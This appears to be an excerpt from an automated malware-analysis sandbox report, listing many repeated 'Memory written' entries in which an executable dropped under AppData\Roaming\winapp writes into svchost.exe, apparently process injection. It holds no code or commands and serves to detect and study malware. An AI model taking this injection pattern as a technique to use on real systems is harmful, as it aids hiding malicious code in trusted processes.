      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019008Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019018Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019020Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019028Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019030Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019038Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019040Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019048Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019050Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019058Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019060Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019068Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019070Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019078Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019080Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019088Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019090Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019098Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400190A0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400190A8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019288Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019290Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400190B8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400190C0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400190C8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400190D0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400190D8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400190E8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400190F0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400190F8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019100Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019108Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019110Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019118Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019120Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019128Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019130Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019138Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019140Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019150Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019158Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019160Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019168Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019170Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: B25F9B4010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0F003F30Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF40010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0F003F48Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EF50000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD0EE30000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F28A0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F28B0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF67E6D5080Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140000000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140001000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140001000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140020000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140020000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140021000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140021000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140023000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140023000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140024000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140024000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F28B0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F28B0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019180Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019188Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019190Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 140019198Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191A0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191A8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191B0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191B8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29D0000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191C0Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 1400191C8Jump to behavior
      Source: C:\Users\user\AppData\Roaming\winapp\44qxnhoiecq.exeMemory written: C:\Windows\System32\svchost.exe base: 159F29C0010Jump to behavior
